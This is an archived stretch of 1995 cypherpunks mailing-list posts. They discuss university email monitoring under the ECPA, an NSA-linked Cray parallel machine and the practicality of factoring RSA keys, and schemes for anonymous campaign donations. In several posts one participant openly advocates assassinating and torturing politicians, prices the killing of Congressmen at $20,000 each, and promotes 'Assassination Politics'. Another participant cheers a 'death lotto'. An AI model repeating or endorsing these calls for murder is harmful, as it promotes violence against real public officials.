constituting a nexus of state action between the state and the
university. Like administrators being appointed by agents of the state
government.

State funding by itself is not sufficient. If that were true, CMU --
which receives almost half its revenue from the government -- would have
to behave reasonably. (It doesn't; check out
http://joc.mit.edu/~joc/cmu.html)

-Declan
(not a lawyer)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 18 Dec 1995 17:03:03 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512180038.QAA01725@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



"Anitro" speculated about the fate and capabilities of the
CCC PIM (processor-in-memory) machine.  A friend of mine was
working on it, and it would have been a screaming machine, no
doubt about it.  He said that the Cray mostly acted like a
really fast network for the processor chips.  As "Anitro"
said, the PIM chips were made by a dedicated NSA company,
Supercomputer Research Center, in Bowie MD.

But, it was nowhere near finished when the company finally went
down, and the team was completely disbanded.  My friend was talking
about going to the auction when the parts of the various machines
were going to be sold, I don't know if he did so.  He suspected that
the various pieces would end up going back east to the Fort
Meade area.  Still, it is such an odd machine that you would
probably have to transfer the staff to finish it, and that didn't
happen.

In any case, while it was fast (1/2 million 1-bit processors,
perhaps as low as 1 nanosecond (1 GHz) cycle time), it was not fast
enough to brute force reasonably strong ciphers.  It's really no joke
that it would take a computer with picosecond clocks the size of the earth
more than the age of the universe to brute force IDEA, for instance.
It would have made a great DES cracker, though; my back-of-the-envelope
calculation has it cracking one key every .75 days on the average.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 18 Dec 1995 10:29:29 +0800
To: cypherpunks@toad.com
Subject: Re: BosniaLINK
Message-ID: <199512172151.QAA12926@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ Irrelevant crap deleted ]

Don't post irrelevant stuff here.

I've noticed an awful lot of crap posted from the replay remailer
to this group over the last few months.  Wish I could figure
out who this jerk is.

Gary
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNSQ+CoZzwIn1bdtAQHrHQF8DyOXYfMYV5czKkMXDqJtMYWaReg1IYiX
QSG801r5LE3hMDa7ooSrQH6LwgDwPAYs
=r8dB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Mon, 18 Dec 1995 10:28:00 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Screening of Unauthorized Access
Message-ID: <v01530502acfa5292262e@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Saw this in the net. I know nothing about the movie personally. Perhaps
someone on the list can comment?

>Unauthorized Access, the documentary on the computer hacker underground from
>an insiders point of view is screening in San Francisco!!!
>
>What the critics say:
>
>"Unauthorized Access lets you see and hear from those people that big
>corporations and the government are so afraid of..." - The Seattle Stranger
>
>"If you want to know what a hacker really is, this is a must" - EXE Magazine
>
>"To see the hacking world from the Inside, try watching Unauthorized Access...
>it shows hackers as they see themselves without the media's usual hype..." -
>The New Scientist
>
>"As a cultural piece, it's what we've been waiting for.  Many of us have long
>suspected that modern-day hackers have a unique and rich culture.
>Unauthorized Acess is something we can point to to prove it." - 2600 - The
>Hacker Quarterly
>
>"Annaliza Savage has made a fascinating documentary about the sick world of
>criminal hacking..."  Mich Kabay - NCSA
>
>"It's a kafka-esque expose of the computer underground, a must see for all
>security experts.  This made me want to go out and become a cop."  - Cult of
>the Dead Cow
>
>Question and Answer session after the screening....
>
>Unauthorized Access is screening at:
>Artists Television Access in San Francisco
>Thursday, December 21, 1995 - 8:30 pm
>922 Valencia Street (at 21st) SF, CA  94110
>(415) 824 3890
>
>For more info on Unauthorized Access http://bianca.com/bump/ua/

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: prf@teleport.com (Paul Farago)
Date: Mon, 18 Dec 1995 09:56:03 +0800
To: cypherpunks@toad.com
Subject: 2 websites
Message-ID: <v01510114acfa6bca2bce@[206.163.120.172]>
MIME-Version: 1.0
Content-Type: text/plain


Interested in Term Limits?  See http://www.termlimits.org

Grass Roots Research's "Portrait of America" at http://www.grr.com

Paul R. Farago, Portland OR






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert" <RDHeffren@gnn.com>
Date: Mon, 18 Dec 1995 10:45:02 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is ths legal?.. (fwd)
Message-ID: <199512172313.SAA25145@mail-e1b.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Sun, 17 Dec 1995 10:18:50 -0500 (EST) 
Black Unicorn <unicorn@schloss.li> writes:

> > On Sun, 17 Dec 1995, Jay Holovacs wrote:
> > Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510
> > et seq.).  "It shall not be unlawful under this chapter for an
> > operator of a switchboard, or an officer, employee, or agent of a
> > provider of wire *or electronic* communication service, whose
> > facilities are used in the trans-mission of a wire communication,

> I disagree. Instead it implies that interception and administrative
> review of content will be tolerated where it is "a necessary
> incident to the rendition of his service or to the protection of the
> rights or property of the provider of that service."  Note that it
> will be the provider who makes the definition in the ex ante application.
> Even worse, the protection that is given is for "a provider of wire
> communication service to the public."

I also disagree because I would interpret it as "It shall not be 
unlawful...to intercept, disclose or use that communication...except 
by utilizing *service observing* or *random monitoring*." That indicates 
to me that specific monitoring is fine, but random monitoring must be 
used for quality control. And how do you become specific without being 
random? QC could be whatever the providers deem it to be, the public 
be damned.

"..anything not specifically allowed is expressly forbidden..."

RDHeffren@gnn.com
RobertH677@aol.com
id=0x95AA98CD 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 18 Dec 1995 10:07:16 +0800
To: cypherpunks@toad.com
Subject: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512172232.RAA13063@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

O.K. I'm new... however...

I remember reading an article about this news release in mid '94
(I believe it was the NY Times), about the time that Cray
Computer Company (Seymour's unsuccessful spinoff company) was
actively seeking bank financing. Anyone remember?

The article was about an NSA contract award to Cray Computer. In
some background:

The Supercomputer industry had been struggling for a while with
reductions in purchases from the U.S. government due to cutbacks
on research spending and the 'end of the cold war'. The situation 
at MasPar had gotten to the point of court reorginization or
worse. In June (of '94) Cray was in such a cash squeeze that it
took out a $17.5 million secured loan to fend collapse. During
July, Cray announced that it was seeking a "partner" to make an
investment in exchange for technology access. Guess who shows up
with plans to build "the ultimate spying machine"? Now, Seymour's 
a nice guy, but money is tight, so he buys in on the hopes for
more a lucrative future relationship. The plot thickens.

The contract calls for Cray to put up $4.6 million to cover the
initial development (didn't they just take out a loan?) of which
about $400,000 will go to the NSA for so called "software
consulting services". It makes one wonder what the "real"
contract was worth (such as producing this surveillance system
in quantity)? There was some speculation in the article about
what this system could be used for, such as DEA operations
outside U.S. borders (Columbia perhaps) or foreign military
communication or enhancement processing of spy satellite photos.

What caught my attention was the architecture.

A "hybrid design linking two supercomputer processors with an
array of HALF A MILLION inexpensive processors" that were
designed by the U.S. government laboratory affiliated with the
NSA. The same chip house that brought us Clipper.

I've not kept up with the "ultimate" demise that eventually
befell Cray Computer Company, but the October 16 FBI filing
on capacity for Digital Telephony got me thinking back to this
article. 1% seems like a rather huge need for horsepower. And
what if GAK doesn't fly? And the widespread use of hard crypto
just keeps increasing?

This kind of machine could, in theory:

1) Implement ALL Clipper(II) based Key Escrow functionality in
   silicon (the easy part) AND allow for simultaneous decrypt and
   surveil of 'who knows how many' Clipper based data streams.

2) Implement general RSA based Prime Factoring functionality in
   silicon (the not so easy part) AND allow massively parallel
   decrypt and surveil of 'who knows how many' RSA/etc. based
   data streams.

3) Implement it all, AND 'on-line' transaction based surveillance
   via the FBI's 1% capacity infrastructure.

Chilling... Who needs key escrow (or RSA private keys) when
you've got a massively parallel prime factoring machine. What if
GAK was to become a 'non-issue'? How fast do you think a machine
such as this could factor RSA 129?

Makes you wonder if 2048 bits will be enough (my guess.. it
won't). But then, I'm sure that when Cray Computer finally folded
(has/hasn't?) all that tech just got sold for scrap eh?

Anitro



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNSadioZzwIn1bdtAQEgYwF+Nf5Azpeore6OPMNU94CpCawxPcPg8g7T
kLQDY9I5Upk7vCe1dCpHm14g8jRYdSDx
=vjJA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 18 Dec 1995 13:20:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
In-Reply-To: <m0tROOn-0008yHC@pacifier.com>
Message-ID: <Pine.CVX.3.91.951217185017.21889B@gibbs.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, jim bell wrote:

> 
> It occurs to me that it would be a major advance if a system could be set up
> that would "blind" campaign donations as to their source:  The donor could
> be satisfied that his donation gets to the candidate or cause, but the
> candidate couldn't know  who actually paid the money (and the donor would be
> unable to prove that he made a donation, for example).  Admittedly there are
> a lot of details that need to be worked out, but if this could be
> accomplished it would change politics as we know it.

Just a straight Chaumian style blinding won't work, as there are too many 
covert channels available via both timing and amounts; For example, Joe 
Random Capitalist-Oppressor could arrange to pay a series of relatively 
small amounts wth different values in the cents field which could be used 
to confirm their payment (e.g. they could be composed to form a digitally 
signed value of some kind ("pollution rools" or "lung cancer is kool") :)

Sen. Dianne Running-Dog could then look for a matching set of donations 
and confirm that the bribe had in fact been paid. 

There are much better ways of reforming the political system -the 
formation of proper political parties with real programmes (the one good 
thing about the newtoid surge); changing the rules for TV advertising, 
etc. Blinding just makes things worse.

Simon // Introducing Covert Chunnels- the british side has a really slow 
         rate, and the french won't let there citizens use their side..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sethf@MIT.EDU
Date: Mon, 18 Dec 1995 10:23:30 +0800
To: holovacs@styx.ios.com
Subject: Re: Oklahoma University: Is this legal?...
Message-ID: <9512180009.AA18900@frumious-bandersnatch.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


	Going on my past experiences with this sort of situation, I
think the problem is

	a) Oklahoma University is public (seems true from
http://www.uoknor.edu/) 

	b) The state of Oklahoma has an "open public records" law

	so

	c) someone decided that everything stored on the University's
computer system was therefore a "public record" (since the computer is
"owned" by the public), and thus had to be accessible by law.

	This seems to be approximately what's going on:

	"Drafted by Associate Chief Counsel Kurt Ockershauser a year
ago, the policy will make a legal statement that e-mail is running on
state property, Colaw said. He said the policy is not an invasion of privacy."

http://www.uoknor.edu/okdaily/issues/fall1995/dec-7/1-email.processed.html

	Someone needs to explain to him that what he is doing is not
legally required, and perhaps violates the ECPA.

================
Seth Finkelstein
sethf@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 13:07:44 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Political Cleanup program
Message-ID: <m0tRWN2-0008yUC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:04 PM 12/17/95 -0800, Detweiler wrote:
>
>JB:
>>Politics is traditionally corrupt, it appears, because donors to politicians
>>and political campaigns expect a quid pro quo for their donations.  Various
>>unsatisfactory solutions include campaign spending limits, etc.
>
>I have an unusual view that I've never seen elsewhere: the problem with
>our government is not that money or PACs are involved, but that the system
>does not handle or resolve the conflicts between them very well. in other
>words, in contrary to the current view that all PACs are evil, I think the
>problem is not that we have PACs, but that our current system does not
>balance their demands in some sensible manner.  the system is
>susceptible to corruption. it is conceivable however that there would be
>a system that involves money and politics but still avoids corruption.

Here's a question I have never heard anyone else ask (or answer!).  "What is
the purpose of a PAC?

To be more specific, a PAC simply seems to be a funnel through which
individual donations flow; why do we need a PAC?  Is it to keep records of
"who's naughty and nice"?  Any contribution that can be made by a PAC could
just as easily be made by one individual.


>>It occurs to me that it would be a major advance if a system could be set up
>>that would "blind" campaign donations as to their source:  The donor could
>>be satisfied that his donation gets to the candidate or cause, but the
>>candidate couldn't know  who actually paid the money (and the donor would be
>>unable to prove that he made a donation, for example).  Admittedly there are
>>a lot of details that need to be worked out, but if this could be
>>accomplished it would change politics as we know it.
>
>what you describe would allow anonymous bribes.

Which, I suggest, is better than a non-anonymous bribe.


> the giver could always


"always"?   Are you sure about that?  

>identify his cash donation "out of band" to the receiver.

It is exactly this that the system I'd propose would prevent.  I realize
that  you may not be able to imagine such a system, but that doesn't mean
that such a system could be designed.  (Before 1975, most of us would not
have been able to imagine public-key encryption, for example.)

A giver could CLAIM to make any sort of donation at all; but if the system
were properly designed he could simply be lying to the  officeholder.

> moreover, other observers
>would not be aware of the relationship. 

Not IMMEDIATELY, perhaps, but eventually the books could be opened, perhaps
as much as years later.  (Let's say, 3 months before the end  of the term of
the politician.

And the amounts donated could withheld, with only the total donated reported
every 3 months or so.  (And perhaps only to 1 or 2 significant digits of
accuracy.)  For example, a Senator will be told on January 1, 1996, that up
until that point he's received "about" $1.4 million dollars of donations.
He would not be able to link these donations with any particular claim.
Somebody could claim to have given him "$2000" of donation, which wouldn't
even show up to the accuracy of the amount told the politician.

Further techniques could be  used to disguise the rate of giving.

>why do you think this would be an improvement? 

Easy.  It would remove much of the reason for a politician to treat one
citizen differently from another citizen.  


>to the contrary our current system works hard to require
>the disclosure of who donated what to a candidate, so the candidate's potential
>hidden agendas and ulterior motives can be revealed. seems reasonable to 
>me.

_EVENTUAL_ public disclosure of such information is not inconsistent with
my idea.


>you are probably barking up the wrong tree here on cypherpunks, however,
>because most of the key "insiders" here are convinced that democracy is
>a proven failure, and that in fact government is invariably corrupt and
>oppressive, no matter what the implementation. the "solutions" advocated
>here are chiefly withdrawal and subterfuge.

I don't  disagree with that assessment.  However, that does not mean that I
don't want to make life as difficult for the politicians as possible until
they are swinging from a rope.



>needless to say I disagree with this. I wonder if some day someone will
>invent a "killer app" that doubles as a political governing system.
>it seems to me politics is one of the last most intractable areas of
>human interaction when many others have been harmonized and systematized
>by the information revolution. I suspect it will eventually succumb to
>technological ingenuity as well. the end result would be a government
>that is not perfect, but is at least as good as the population that
>drives it, and no worse. (in contrast today we seem to have a government
>that is no better than the least common denominator).
>
>
>JB, I have to wonder however how your ideas about campaign reform tie into 
>your prior advocation

"Prior"?  It's not "prior."  I haven't changed my previous position one bit.

> of political assinations as a legitimate form of
>citizen power.  have you given up on the idea of murdering politicians as
>a means of political reform?

Not "political reform."   Political ELIMINATION.  I want to eliminate the
entire  concept of a heirarchial government.


> or are you now just coupling that idea with
>campaign reform to put some new bells and whistles on 
>your overall ideological package?


I repeat my previous statement.  I'm happy to see them squirm before they
are led to the gallows.  Making life as difficult as possible for them is my
goal.  Using technology to disable their normal methods of corruption would
be an excellent start.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 17:08:48 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Political Cleanup program
Message-ID: <m0tRWUD-0008zuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:03 PM 12/17/95 -0500, you wrote:
>On Sun, 17 Dec 1995, jim bell wrote:
>
>> 
>> It occurs to me that it would be a major advance if a system could be set up
>> that would "blind" campaign donations as to their source:  The donor could
>> be satisfied that his donation gets to the candidate or cause, but the
>> candidate couldn't know  who actually paid the money (and the donor would be
>> unable to prove that he made a donation, for example).  Admittedly there are
>> a lot of details that need to be worked out, but if this could be
>> accomplished it would change politics as we know it.
>
>Just a straight Chaumian style blinding won't work, as there are too many 
>covert channels available via both timing and amounts; For example, Joe 
>Random Capitalist-Oppressor could arrange to pay a series of relatively 
>small amounts wth different values in the cents field which could be used 
>to confirm their payment (e.g. they could be composed to form a digitally 
>signed value of some kind ("pollution rools" or "lung cancer is kool") :)

Yes, as I suggested a number of details would be necessary to avoid this.
Reporting only cumulative donations, occasionally over a long period of time
(once every three months, for instance), and even then only approximating
the total number would make  doing such a correlation extremely difficult.


>Sen. Dianne Running-Dog could then look for a matching set of donations 
>and confirm that the bribe had in fact been paid. 
>
>There are much better ways of reforming the political system -the 
>formation of proper political parties with real programmes (the one good 
>thing about the newtoid surge); changing the rules for TV advertising, 
>etc. Blinding just makes things worse.

The blinding needs only be temporary; long enough so the politician can't
act improperly on the donation, but  eventually revealed in enough time to
expose political influence before  the next election.


Besides, I have already proposed what I consider to be a _better_ method of
reforming government.  It's called "Assassination Politics."  Perhaps you've
heard of it.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 18 Dec 1995 10:30:51 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Is ths legal?...
In-Reply-To: <ckp8qg_00bkNQ1VJVI@andrew.cmu.edu>
Message-ID: <Pine.CVX.3.91.951217194213.24347A@gibbs.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Declan B. McCullagh wrote:

> State funding by itself is not sufficient. If that were true, CMU --
> which receives almost half its revenue from the government -- would have
> to behave reasonably. (It doesn't; check out
> http://joc.mit.edu/~joc/cmu.html)


There is some precedent for Federal funding being used to influence the 
behaviour of universities - most notably with anti-discrimination. I 
don't think federal contracts affect this particular area.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 13:26:14 +0800
To: Mike Ingle <inglem@adnetsol.com>
Subject: Re: Political Cleanup program
Message-ID: <m0tRWax-00090aC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I don't consider these two ideas mutually exclusive.  As I pointed out
to Detweiler (under his alias "Nuri") I'm happy to see the politicians
tortured before they are killed.


At 02:48 PM 12/17/95 -0800, you wrote:
>Good ideas, but you're getting soft. I liked the death lotto much better.
>
>							Mike
>
>> Politics is traditionally corrupt, it appears, because donors to politicians
>> and political campaigns expect a quid pro quo for their donations.  Various
>> unsatisfactory solutions include campaign spending limits, etc.
>> 
>> It occurs to me that it would be a major advance if a system could be set up
>> that would "blind" campaign donations as to their source:  The donor could
>> be satisfied that his donation gets to the candidate or cause, but the
>> candidate couldn't know  who actually paid the money (and the donor would be
>> unable to prove that he made a donation, for example).  Admittedly there are
>> a lot of details that need to be worked out, but if this could be
>> accomplished it would change politics as we know it.
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 10:20:39 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Is ths legal?...
In-Reply-To: <ckp8qg_00bkNQ1VJVI@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.951217195359.9842A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 17-Dec-95 Re: Is ths legal?... by
> Alan Olsen@teleport.com 
> > In looking at their homepage, it appears to be a state funded school.
> > (There is not alot of background on the school history or affiliations on
> > their homepage except for a note that it was founded by the territorial
> > legislature a number of years before becoming a state..)
> 
> My understanding is that it is a state school. But for state action to
> be present, there has to be a significant interdependent relationship
> constituting a nexus of state action between the state and the
> university. Like administrators being appointed by agents of the state
> government.
> 
> State funding by itself is not sufficient. If that were true, CMU --
> which receives almost half its revenue from the government -- would have
> to behave reasonably. (It doesn't; check out
> http://joc.mit.edu/~joc/cmu.html)
> 
> -Declan
> (not a lawyer)

Obviously.

> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 18 Dec 1995 17:03:33 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Political Cleanup program
Message-ID: <199512180430.UAA02707@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/17/95 -0800, jim bell wrote:
> It occurs to me that it would be a major advance if a system could be set up
> that would "blind" campaign donations as to their source:  The donor could
> be satisfied that his donation gets to the candidate or cause, but the
> candidate couldn't know  who actually paid the money

To make this work, the government would need to prohibit individuals
from campaigning for politicians, taking out ads with political 
consequences, and so on and so forth.   A short step from 
totalitarianism

A better solution is to move assets and money into forms where
politicians cannot get at them, thus reducing the power of politicians,
and thus the incentive to buy favors from them.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 18 Dec 1995 15:32:02 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <acfa2f2812021004d314@[205.199.118.202]>
Message-ID: <199512180550.VAA13167@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Correction of one detail:

> tcmay@got.net (Timothy C. May) writes:
> When you've done this, and concluded that RSA-129 could be done in, say, X
> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
> group), and on to the 1024- and 2048-bit keys. Tell us how many years or
> centuries it will take. (Hint: Rivest and Schneier have done these

The BlackNet key break didn't have any MIT involvement: it was done by
Paul Leyland of Oxford, Arjen Lenstra of Bellcore, Alec Muffet of Sun UK,
and Jim Gillogly of Cypherpunks, RAND, and Gillogly Software in no
particular order.

	Jim Gillogly
	Trewesday, 28 Foreyule S.R. 1995, 05:49




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Mon, 18 Dec 1995 15:32:16 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
Message-ID: <199512180553.VAA12388@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 12/17/95 -0800, you wrote:

>Here's a question I have never heard anyone else ask (or answer!).  "What is
>the purpose of a PAC?
>
>To be more specific, a PAC simply seems to be a funnel through which
>individual donations flow; why do we need a PAC?  Is it to keep records of
>"who's naughty and nice"?  Any contribution that can be made by a PAC could
>just as easily be made by one individual.

PACs are to politics what mutual funds are to investing - that is, a
mechanism for investors to diversify their holdings, and to allow for the
managers of those holdings to use their expert/specialized knowledge to
achieve better returns (at the cost of some frictional skimmings-off) than
individuals would on their own. 

But I'm not sure what this has to do with C-punks any longer. 
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Dec 1995 17:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfa2f2812021004d314@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 12/17/95, Anonymous wrote:

>What caught my attention was the architecture.
>
>A "hybrid design linking two supercomputer processors with an
>array of HALF A MILLION inexpensive processors" that were
>designed by the U.S. government laboratory affiliated with the
>NSA. The same chip house that brought us Clipper.

First, half a million chips is not that big a deal...the Connection Machine
had up to 64,000. Very few cryptographic problems of interest to us will be
affected by a mere factor of a million or so.

Second, there was work on a "processor-in-memory" architecture, in
conjunction with a Bowie, Maryland spook-connected company. Perhaps this is
what you are thinking of?

Third, all avenues of continued funding having fallen through, Cray
Computer (not Cray Research, of course) was shut down and assets
liquidated. I haven't heard what's become of Seymour, though. (He is
undoubtedly an asset, buy I doubt the Agency would have him liquidated.)

>I've not kept up with the "ultimate" demise that eventually
>befell Cray Computer Company, but the October 16 FBI filing
>on capacity for Digital Telephony got me thinking back to this
>article. 1% seems like a rather huge need for horsepower. And
>what if GAK doesn't fly? And the widespread use of hard crypto
>just keeps increasing?

The tightly-coupled supercomputers are hardly needed for these sorts of
problems.

>This kind of machine could, in theory:
>
>1) Implement ALL Clipper(II) based Key Escrow functionality in
>   silicon (the easy part) AND allow for simultaneous decrypt and
>   surveil of 'who knows how many' Clipper based data streams.

Huh? First, what evidence do you have for this claim? Second, who cares?
Implementing Clipper in a Cray Computer machine--why bother?

As to the claim that a million-processor machine could do this, you need to
work out the math. (If a backdoor exists, or the LEAF has been gotten, a
supercomputer is not needed....)

>2) Implement general RSA based Prime Factoring functionality in
>   silicon (the not so easy part) AND allow massively parallel
>   decrypt and surveil of 'who knows how many' RSA/etc. based
>   data streams.

Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
has two factors.)

If you mean using supercomputers to brute force the general factoring of an
RSA modulus, this is nonsense. While there may be math shortcuts we don't
yet publically know about which make factoring easier than we currently
think it is, a mere million or even a billion processors will not make a
dent in the factoring of, say, a 700-digit modulus. See the tables in
Schneier and elsewhere for some estimates of factoring efforts needed.

>3) Implement it all, AND 'on-line' transaction based surveillance
>   via the FBI's 1% capacity infrastructure.

Let's see some numbers. (On second thought, let's not.)


>Chilling... Who needs key escrow (or RSA private keys) when
>you've got a massively parallel prime factoring machine. What if
>GAK was to become a 'non-issue'? How fast do you think a machine
>such as this could factor RSA 129?

Well, do the math. The MIPS-years for the RSA-129 crack were publicized, so
the computation for a million SPARC-equivalent (or even
UltraSPARC-equivalent) can be done.

When you've done this, and concluded that RSA-129 could be done in, say, X
minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
group), and on to the 1024- and 2048-bit keys. Tell us how many years or
centuries it will take. (Hint: Rivest and Schneier have done these
calculations....)


--Tim May, who fears that he's just been trolled by Derek Atkins


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 16:44:30 +0800
To: brew@mtek.com
Subject: Re: Campaign Finance Reform
Message-ID: <m0tRZDX-0008ycC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:43 PM 12/17/95 PST, you wrote:
>On December 17th you wrote:
>
>>To: cypherpunks@toad.com
>>From: jim bell <jimbell@pacifier.com>
>>Subject: Political Cleanup program
>>
>>Politics is traditionally corrupt, it appears, because donors to politicians
>>and political campaigns expect a quid pro quo for their donations.  Various
>>unsatisfactory solutions include campaign spending limits, etc.
>>
>>It occurs to me that it would be a major advance if a system could be set up
>>that would "blind" campaign donations as to their source:  The donor could
>>be satisfied that his donation gets to the candidate or cause, but the
>>candidate couldn't know  who actually paid the money (and the donor would be
>>unable to prove that he made a donation, for example).  Admittedly there are
>>a lot of details that need to be worked out, but if this could be
>>accomplished it would change politics as we know it.
>
>If you'll give it some more thought, Jim, you'll see that it has a loophole
>in it you could drive a semi through. There is no way to keep a donor from
>passing the word to the recipient. No matter how you work out the details,
>it's impossible to keep the information from passing. It could never work.

It is absolutely true that you couldn't stop a person from communicating
claims of a donation to a politician.   But what you COULD do is to ensure
that the donor couldn't PROVE that he made such a donation.  In other words,
_I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
senator would have no idea that I wasn't telling the truth.  The people who
REALLY made such donations would be helpless.


>Consider a more radical, and possibly workable, solution to the thorny issue
>of campaign finance. If we go back to the root of the problem, it seems
>clear that it is the high cost of a campaign. If a typical campaign were to
>cost a tenth or a twentieth of what it presently costs, we'd have gone a
>long way towards ameliorating the situation. How to do it? Simply ban all
>paid political spot ads - TV, radio, newspaper - all of them. Write it so
>that there's damned little wiggle room - a candidate can use lawn signs, but
>not billboards. They can use personal appearances, but not commercials.
>They can spend all the gas money they want running around their state or
>district, but not a dime for media spots.
>

Well, I have an even better and cheaper solution to the problem of
government and politics.  At an average of $20,000 per Congressman, we could
clean up Washington for $10 million dollars.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 18 Dec 1995 17:12:52 +0800
To: "Richard D. Sheffar" <rick@muskoka.net>
Subject: Re: [NOISE] BIO-MUNITION: gifs of perl-RSA tattoo
